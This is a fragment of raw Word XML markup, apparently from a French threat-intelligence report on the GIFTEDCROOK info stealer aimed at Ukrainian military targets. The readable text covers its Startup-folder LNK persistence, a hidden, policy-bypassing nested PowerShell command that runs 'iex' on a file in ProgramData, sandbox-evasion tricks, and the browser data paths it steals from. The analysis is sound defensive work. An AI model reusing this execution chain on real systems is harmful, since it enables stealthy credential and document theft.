            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ministère de la Défense répertoriant les obligations militaires et les manifestes d’équipement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5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6009663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2612044" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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20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militaire pour les flottes de camions KrAZ.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6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6681263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2674624" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4624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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.3. Comment la chaîne s’exécute-t-elle ?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7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6992008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Lorsque la victime se connecte à nouveau, Windows exécute le fichier LNK situé dans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8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7199653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="545322" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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32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dossier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9904" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1428750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7197948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5308483" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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084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Startup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. La cible du fichier LNK est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cmd.exe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, avec des arguments qui lancent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0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7405393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2868673" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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6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session Powershell à double imbrication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1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7696182</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5346884" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4688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53"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">cmd.exe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/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c start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/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min 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</w:rPr>
                          <w:t xml:space="preserve">""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 powershell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NoPr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Win Hidd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Ex Bypass </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle55"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">-</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle54"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Com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2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7851122</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5738964" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8964" cy="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4" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle60"/>
                            <w:spacing w:val="-7"/>
                            <w:u w:val="double" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">"powershell -NoPr -Ex Bypass -Com </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle72"/>
                            <w:spacing w:val="-7"/>
                            <w:u w:val="double" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">""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  <w:u w:val="double" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">iex (gc 'C:\ProgramData\KKN' -raw)</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle72"/>
                            <w:spacing w:val="-7"/>
                            <w:u w:val="double" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">""</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle60"/>
                            <w:spacing w:val="-7"/>
                            <w:u w:val="double" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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8299038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Le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powershell.exe</w:t>
                        </w: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 externe lance un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powershell.exe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interne. Les deux utilisent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5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8514303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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l'option </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="-4"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">-ExecutionPolicy Bypass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pour contourner les restrictions d'exécution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8729568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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scripts et l'option </w:t>
                        </w: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-WindowStyle Hidden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pour masquer les fenêtres visibles. La session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8944833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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interne lit le script de chargement à partir du répertoire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C:\ProgramData\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et l'exécute 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809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9160098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5540155" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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015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Invoke-Expression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. Chaque version utilise un alias différent pour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Get-Content</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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9120" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6442075</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9160098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="295158" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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15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gc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014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9375363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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cat</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="25"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> ou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type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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">), ce qui modifie la signature de la ligne de commande sans changer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1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9572013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="897366" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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736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fonctionnalité.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21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321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42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526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628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16038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5213359</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4345304" cy="349884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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45304" cy="3498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45304" h="349884">
                          <a:moveTo>
                            <a:pt x="1061720" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4345304" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4345304" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1061720" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1061720" y="349884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1061084" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1061084" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="349884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1061720" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4345304" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4345304" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1061720" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1061720" y="349884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1061084" y="349884"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1061084" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3498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68576" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1997710</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6210309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362585" cy="198754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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585" cy="1987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585" h="198754">
                          <a:moveTo>
                            <a:pt x="0" y="198754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="362585" y="198754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="362585" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="198754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7984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5213359</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4352289" cy="2132330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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2289" cy="21323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52289" h="2132330">
                          <a:moveTo>
                            <a:pt x="4349115" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4349115" y="2132330"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1064895" y="6350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1064895" y="2125980"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="2132330"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="2129155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4352289" y="2129155"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1739265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4345940" y="1739265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1349375"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4345940" y="1349375"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="743585"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4345940" y="743585"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4345940" y="353695"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4352289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90080" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6622414</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1341129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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0441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1341129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3147059" cy="844550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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7059" cy="8445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47059" h="844550">
                          <a:moveTo>
                            <a:pt x="635" y="844550"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="645160"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="979805" y="645160"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="979805" y="844550"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="645795"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="980439" y="645795"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2328544" y="629919"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2328544" y="430530"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2773044" y="430530"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2773044" y="629919"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2327909" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2773679" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3146425" y="214630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3146425" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3147059" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2985134" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2985134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08512" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1509395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3657609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="363223" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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22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22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363220" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36322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341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5605789</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4244339" cy="2407288"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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4339" cy="24072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44339" h="2407285">
                          <a:moveTo>
                            <a:pt x="0" y="2407285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1510029" y="2407285"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="989965" y="2390140"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="989965" y="2190749"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1931035" y="2190749"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1931035" y="2390140"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097915" y="1583690"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097915" y="1384300"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3916044" y="1384300"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3916044" y="1583690"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097280" y="1384935"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3916679" y="1384935"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097915" y="1193800"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097915" y="994410"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4161154" y="994410"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4161154" y="1193800"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097280" y="995044"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4161789" y="995044"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097915" y="803910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097915" y="604520"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1460499" y="803275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097280" y="803275"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1459865" y="604520"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1459865" y="803910"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097280" y="605155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1460499" y="605155"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097915" y="589280"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097915" y="389890"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3916044" y="389890"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3916044" y="589280"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097280" y="390524"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3916679" y="390524"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097915" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097915" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4243704" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4243704" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097280" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="424433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35136" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2409825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8012439</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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37184" behindDoc="1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8012439</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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5376" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4010025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8401059</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1424943" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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494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4939" h="199390">
                          <a:moveTo>
                            <a:pt x="816610" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="816610" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1424939" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1424939" y="199390"/>
                          </a:lnTo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608330" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60833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947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8615689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1182369" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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36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2369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181735" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1181735" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="118236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57664" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3502660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8933189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3158489" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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848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8489" h="199389">
                          <a:moveTo>
                            <a:pt x="2713354" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2713354" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3157854" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3157854" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2712719" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3158489" y="634"/>
                          </a:lnTo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1918334" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1918334" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="191896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176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9147819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="445770" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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577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577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445135" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445135" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="44577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278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8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380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8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4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38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Les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loaders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Powershell sont des scripts fortement obfusqués (65 à 74 Ko). Les fonctions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5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3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sont nommées à l’aide de mots anglais aléatoire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s reliés par des traits de soulignement (par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1327808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="602460" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4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exemple,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7904" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3904615</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1326103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2832618" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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6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flexibility_denominator_wiretap()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892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1541368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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polliwog_scenery_reward_plane_preset()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).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 Des</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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centaines</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> de lignes</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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9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1756633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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commentaires inutiles et d’appels à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Sleep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avec des valeurs fractionnaires (par exemple,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097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1971898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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Sleep 1,453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) gonflent le script et allongent le temps d’exécution afin d’échapper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2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2168548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1378468" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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84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l’analyse en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sandbox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3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2974017</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4366045" cy="267667"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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66045" cy="26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21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34"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4. L'évolution de GIFTEDCROOK : </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle73"/>
                            <w:spacing w:val="73"/>
                          </w:rPr>
                          <w:t xml:space="preserve">result.dll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4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3441965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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La charge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 utile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finale est une DLL nommée en interne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qui exporte une seule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5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3643218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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fonction,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Func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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">. Ce fichier est un</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="-31"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">info stealer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personnalisé, compilé pour x86-64 avec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6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3838163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">libcurl 8.14.0-DEV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lié statiquement. Il cible les navigateurs basés sur Chromium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7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4016398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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(Chrome, Edge, Opera) ainsi que Firefox, et collecte également des documents et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8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4189753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3232591" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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25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à partir du système de fichiers de la victime.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9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4872148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1419381" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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9381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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.1. Navigateur ciblés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0192" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1071244</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5224168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757433" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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4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Navigateur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1216" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2410459</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5224168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2426009" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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600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Chemin vers les données utilisateur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2240" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2016760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5590763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3139985" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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998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%LOCALAPPDATA%\Google\Chrome\User Data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32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5594373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1021465" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38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146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Google Chrome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4288" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
